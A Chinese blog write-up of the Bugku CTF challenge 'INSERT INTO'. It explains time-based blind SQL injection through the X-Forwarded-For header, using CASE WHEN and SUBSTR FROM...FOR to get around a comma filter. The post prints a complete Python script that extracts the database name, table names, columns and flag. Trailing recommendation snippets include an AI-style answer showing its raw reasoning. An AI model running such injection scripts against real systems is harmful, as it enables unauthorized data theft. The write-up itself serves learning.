记一道INSERT INTO盲注的CTF题目

最新推荐文章于 2022-08-15 21:49:25 发布
原创 最新推荐文章于 2022-08-15 21:49:25 发布 · 419 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

本文介绍了一种利用盲注技术破解网站安全漏洞的方法,通过构造特定的payload并观察网站响应时间来猜测数据库信息,包括数据库名、表名、列名及最终的flag。

题目链接:链接

题目给出了源码(如下),可以看到网站储存了用户访问时的ip信息。

除了逗号以外未过滤其他输入,直接拼接到insert into语句中,存在注入点,由于没有输出点,考虑使用盲注。

<?php
error_reporting(0);

function getIp(){
$ip = '';
if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
$ip = $_SERVER['REMOTE_ADDR'];
}
$ip_arr = explode(',', $ip);
return $ip_arr[0];

}

$host="localhost";
$user="";
$pass="";
$db="";

$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");

mysql_select_db($db) or die("Unable to select database");

$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);

由于过滤了逗号无法使用if(a,b,c)格式测试,改为使用case when else格式代替。

测试数据库长度,网站延迟回显,证明payload构造成功。

接着猜解名字需要用到substr,被过滤的逗号可以用 from for代替,如

substr((select flag from flag) from 1 for 1

附:题目完整解题过程逐步演示代码

import requests
import time
url="http://123.206.87.240:8002/web15/"
i=0
schelen=0
print("开始猜解数据库长度")
while True:
    payload="127.0.0.1' and case when(length(database())>"+str(i)+") then sleep(5) else 1 end)#"
    # print(payload)
    start=time.time()
    headers={'X-Forwarded-For':payload}
    demo=requests.get(url,headers=headers)
    final=time.time()

    if final-start>4:
        schelen+=1
        print(schelen)
    else:
        print("数据库名长度"+str(schelen))
        break
    i+=1
print("开始猜解database")
flag=""
for j in range(1,schelen+1):
    for k in range(40,128):
        payload = "127.0.0.1' and case when(ascii(substr(database() from "+str(j)+" for 1))="+str(k)+") then sleep(5) else 1 end)#"
        # print(payload)
        start = time.time()
        headers = {'X-Forwarded-For': payload}
        demo = requests.get(url, headers=headers)
        final = time.time()
        if final-start>4:
            flag+=chr(k)
            print(flag)
print("开始猜解表名")
flag=""
for j in range(1,15):
    for k in range(40,128):
        payload = "127.0.0.1' and case when(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()) from "+str(j)+" for 1))="+str(k)+") then sleep(5) else 1 end)#"
        # print(payload)
        start = time.time()
        headers = {'X-Forwarded-For': payload}
        demo = requests.get(url, headers=headers)
        final = time.time()
        if final-start>4:
            flag+=chr(k)
            print(flag)
print("开始猜解flag表列名")
flag=""
for j in range(1,15):
    for k in range(40,128):
        payload = "127.0.0.1' and case when(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name=0x666c6167) from "+str(j)+" for 1))="+str(k)+") then sleep(5) else 1 end)#"
        # print(payload)
        start = time.time()
        headers = {'X-Forwarded-For': payload}
        demo = requests.get(url, headers=headers)
        final = time.time()
        if final-start>4:
            flag+=chr(k)
            print(flag)
print("开始猜解flag")
flag=""
for j in range(1,35):
    for k in range(40,128):
        payload = "127.0.0.1' and case when(ascii(substr((select flag from flag) from "+str(j)+" for 1))="+str(k)+") then sleep(5) else 1 end)#"
        # print(payload)
        start = time.time()
        headers = {'X-Forwarded-For': payload}
        demo = requests.get(url, headers=headers)
        final = time.time()
        if final-start>4:
            flag+=chr(k)
            print(flag)

 

bugku INSERT INTO入(基于时间的,详细教程)
wssmiss的博客
07-22 1562
题目 链接地址:http://123.206.87.240:8002/web15/ 分析 打开页面后: 分析页面的php代码 通过源码分析,入点在x-forwarded-for:client,proxy1,proxy2的clienr处。获取用户ip,并把ip插入到client_ip表中的ip列中 因为源码第一行,关闭了错误报告,所以没有回显。在此采取基于时间的 ...
实战题——Hack World
Marsper的博客
09-26 680
Hack World——布尔 题面如下图 首先在搜索框中输入0,1或2测试显示结果 输入0时的显示结果 输入1时显示如下 输入2时的显示结果如下 继续测试得知输入1和2以外的数字显示结果和0的结果一样 继续测试,输入数字以外的英文测试,显示结果如下 结果发现都显示bool(false)错误 所以判断此题为数字型的bool。 根据上篇介绍过的知识,所以用sql入语句继续进行测试 输入 if(ascii(substr((select(flag)from(flag)),1,1))=102,1,
CTF实例题-
A1956936030的博客
09-26 877
1.例题如下
CTF-Web7(涉及脚本)
→_→
08-21 1342
7.who are you? 进入这个页面,发现他获取了我的ip,首先想到的就是user agent入,用updatexml试一下,什么错的没有报...看来这个思路不行(:user agent入和updatexml不会的参考Sqli-labs之Less-18和Less-19) 百度了才知道这是一道伪造IP的题,总结下,伪造IP的HTTP头都有这些: X-Forwarded-For Client-IP x-remote-IP x-originating-IP x-re...
Bugku-INSERT INTO
苟有恒,必有三更眠,五更起。
07-08 1013
INSERT INTO 入 原题链接 http://120.24.86.145:8002/web15/ 分析 题目给出源码 &lt;?php error_reporting(0); function getIp(){ $ip = ''; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $ip = $_SERVE...
bugku ctf INSERT INTO
qq_42777804的博客
08-02 648
不如写个Python吧 error_reporting(0); function getIp(){ $ip = ''; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; }else{ $ip = $_SERVER['REMOTE_ADDR']; } $ip_arr = ex...
bugku web题INSERT INTO入.docx
05-16
### bugku Web题INSERT INTO入知识点详解 #### 一、背景与目标 在CTF(Capture The Flag)比赛中,Web安全挑战是常见的题型之一。本文档中的“bugku web题INSERT INTO入”是一个典型的利用SQL入漏洞进行攻击...
CTF】关于SQL的细节
publicStr的博客
11-29 2792
目录: 0x01 CTF题目中关于load_file()、char()、hex()、unhex()、like、过滤空格、过滤引号及相关问题 0x02 某简单题目中关于order by利用排序布尔题目及源码 0x03 某CTF题解,+泄露+反序列化       0x01 CTF题目中关于load_file()、char()、hex()、unhex()、like、过滤空格、过滤引...
mysqlctf_BUUCTF[归纳]sql入相关题目
weixin_42322347的博客
02-02 1740
这是我自己对于sql入的部分ctf题型的归纳,均来自buuctf的平台环境。[0CTF 2016]piapiapia我尝试了几种payload,发现有两种情况。第一种:Invalid user name第二种:Invalid user name or password第一步想到的是或者报错,因为fuzz一波有一些是没有过滤掉的。对于后台的拦截我想到的可能是黑名单或者是正则表达式匹配。先不管,...
利用X-Forwarded-For入:时间与SQL技巧
这个Bugku Web题目INSERT INTO入挑战要求选手运用高级的SQL入技巧,尤其是时间,来破解服务器的输入过滤机制,以获取数据库的相关信息。这既考察了技术能力,也考验了在实际环境中解决问题的策略。
insert 语句_CTF从入门到提升(七)insert 等数据表相关操作入及例题分享
weixin_39607836的博客
12-01 331
insert语法介绍insert插入到某张表中,后面跟上设置的参数以及值。在insert的时候可以使用哪些入方法呢?比如这个报错的方法,如果报错可以使用,那么同理其他函数也是可以使用的。首先看下语句使用,如下图:update 语法介绍update 即对整张表做数据更新我们在set 这个位置做一个入,报错后可以带出数据:delete语法介绍delete即删除表中的数据例如我删除id=7的数据例...
的练习(作业)
qq_43473164的博客
04-08 362
基于boolean的 第一步 测试 payload:’ and 1=1#(页面不变) | ’ and 1=2#(页面变化) 说明存在sql漏洞. 第二步 爆表:payload:’ and ascii(substr((select table_name from information_schema.tables where table_schema=database()),1,1)...
SQL入之
每天一小步,进步一大截
08-15 1772
关于SQL入的详细解析,有什么疑问欢迎大家提出
SQL入 (中级篇)Insert
热门推荐
weixin_41472455的博客
05-14 6万+
insert入: 其实对于初学SQL入,并不需要区分入类型。 但是要理解insert入,首先需要理解SQL的insert语句 举个例子 :在Student表插入bob的信息 Student表: |-----------------------------------| | name | age | grade | |-----------------------------------| | andy | 14 | 98 | ...
CTF之Bugku insert into
weixin_41607190的博客
01-07 435
原理:x-forwared-for入,时间insert入 点开网址就是这么一句话,源码也给出 function getIp(){ $ip = ''; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; #从x-forwared-for获取ip }else{ $ip =...
bugku------INSERT INTO
bylfsj的博客
09-30 534
原创 bugku-Web-INSERT INTO入(case入技巧(逗号被过滤的延迟)+延迟入脚本) ...
ctf】sql入——insert、update和delete
wlllllianqing的博客
10-03 1016
insert、update和deleteinsert:插入语法 insert into 表名 (参数1,参数2,参数3) values (x,y,z); 入语句: insert into user (id, username,password) values ('4','w64654ll'or updatexml(1,concat(0x7e,database()),0),'233'); update:更新语法 update 表名 set 列名1= x where 列名2 =y 列名1:
bugku-web-insert into
realstarstarli的博客
08-09 290
insert into 题目分析 题目地址http://123.206.87.240:8002/web15/ 首先题目中已经给出了php源码,先分析一下。我在原来的代码上做了一些修改,便于调试操作。 <?php //隐藏报错信息 error_reporting(0); // 函数功能获取用户的ip地址 function getIp() { // PHP使用$_SERVER['HTTP_X_FORWARDED_FOR']获取IP //
CTF从入门到提升(七)insert 等数据表相关操作入及例题分享
anquanniu的博客
08-29 412
本次分享内容:insert update delete对数据表操作的一些基本问题及例题分享。 insert语法介绍 insert插入到某张表中,后面跟上设置的参数以及值。在insert的时候可以使用哪些入方法呢? 比如这个报错的方法,如果报错可以使用,那么同理其他函数也是可以使用的。 首先看下语句使用,如下图: update 语法介绍 update 即对整张表做数据更新 我们在set 这个...
这是一道ctf题目
最新发布
06-19
<think>我们有一个CTF题目中的字符串:f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAA8ARAAAAAAABAAAAAAAAAAJA/AAAAAAAAAAAAAEAAOAAJAEAAHgAdAAYAAAAEAAAAQ...(省略部分)根据之前的引用,特别是引用[3]中提到的解密过程,我们可以推测这可能是一个二进制文件(因为开头是"f0VMRgIBA",这看起来像ELF文件的魔数)。但是,用户给出的字符串是Base64编码的吗?还是直接是二进制数据?观察字符串:它以"f0VMRgIBA"开头,这类似于ELF文件头的Base64编码。因为ELF文件头通常以"\x7fELF"开始,我们将其转换为Base64:"\x7f"的ASCII码是127,在Base64编码表中,127对应的字符并不是直接可读的,但我们可以尝试将整个字符串进行Base64解码。步骤:1.将给定的字符串(Base64编码)解码为二进制数据。2.将二进制数据保存为文件,然后分析文件类型。但是,用户给出的字符串很长,而且中间有省略号。我们无法处理省略的部分,所以只能假设这是一个完整的Base64字符串。然而,引用[3]中提到的解密过程是一个自定义的算法,但用户提供的字符串看起来像Base64编码的二进制文件,所以可能不需要引用[3]的算法。另外,引用[1]中提到了八进制数字字符串转换为ASCII字符的方法,但这里不是八进制数字字符串,而是Base64字符串。所以,我们尝试Base64解码。由于字符串很长,我们可以写一个简单的程序来解码并保存为文件,然后使用工具分析(如file命令、strings命令等)。但在这里,我们只能进行Base64解码,然后查看文件头确认。意:在Python中,我们可以用base64模块进行解码。示例代码:importbase64encoded_str="f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAA8ARAAAAAAABAAAAAAAAAAJA/AAAAAAAAAAAAAEAAOAAJAEAAHgAdAAYAAAAEAAAAQ..."#这里需要完整的字符串decoded_data=base64.b64decode(encoded_str)withopen('output','wb')asf:f.write(decoded_data)然后,我们可以用命令行工具检查文件类型:fileoutput如果文件是ELF可执行文件,那么我们可以尝试运行它(在安全环境下)或者用逆向工程工具(如IDA、Ghidra)分析。但是,用户没有提供完整的字符串,所以我们无法实际执行。因此,我们只能提供方法。另外,如果题目有额外的加密或混淆,可能需要进一步分析。但根据字符串开头,很大可能是ELF文件。因此,回答如下:</think>要解码或分析CTF题目中的字符串 `f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAA8ARAAAAAAABAAAAAAAAAAJA/AAAAAAAAAAAAAEAAOAAJAEAAHgAdAAYAAAAEAAAAQ...`,请按以下步骤操作: ### 🔍 解码步骤分析 1. **识别文件类型** - 字符串开头 `f0VMRgIBA` 是 **ELF可执行文件头的Base64编码**(对应魔数 `\x7fELF`)。 - 使用Base64解码还原原始二进制文件: ```python import base64 encoded_str = "f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAA8ARAAAAAAABAAAAAAAAAAJA/AAAAAAAAAAAAAEAAOAAJAEAAHgAdAAYAAAAEAAAAQ..." # 替换为完整字符串 decoded_data = base64.b64decode(encoded_str) with open("output.elf", "wb") as f: f.write(decoded_data) ``` 2. **分析ELF文件** - 通过工具检查文件属性: ```bash file output.elf # 查看文件类型(如ELF 32/64位) strings output.elf # 提取文件中的可读字符串 objdump -d output.elf # 反汇编查看汇编代码 ``` - 若文件包含加密逻辑(如引用[3]中的自定义解密流程),需用逆向工具(Ghidra/IDA)分析关键函数。 3. **处理加密逻辑** - 若发现类似引用[3]的异或加密(`flag += chr(ord(b[i]) ^ ord(tag[i % 6]))`),需定位密钥(如`tag = 'redctf'`)和密文数据段。 - 示例解密片段: ```python tag = 'redctf' # 或根据上下文调整密钥 encrypted_data = [...] # 从文件中提取的密文字节 flag = ''.join(chr(encrypted_data[i] ^ ord(tag[i % len(tag)])) for i in range(len(encrypted_data))) ``` ### ⚠️ 意事项 - **动态调试**:若文件可执行,使用 `gdb` 或 `strace` 跟踪运行时行为(如输入/输出、系统调用)。 - **隐写可能性**:检查文件是否隐藏额外数据(如通过 `binwalk` 分析)。 - **环境差异**:密钥或算法可能依赖运行环境(如引用[3]中密钥随环境变化)[^3]。 ### 📝 相关问题 1. Base64解码后文件不是ELF格式怎么办? 2. 如何快速定位ELF文件中的加密函数? 3. 遇到非标准加密算法(如自定义位操作)如何逆向分析? > 引用说明:ELF文件头特征分析参考标准文件格式文档[^1],异或解密方法借鉴了CTF逆向题的常见模式[^3]。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值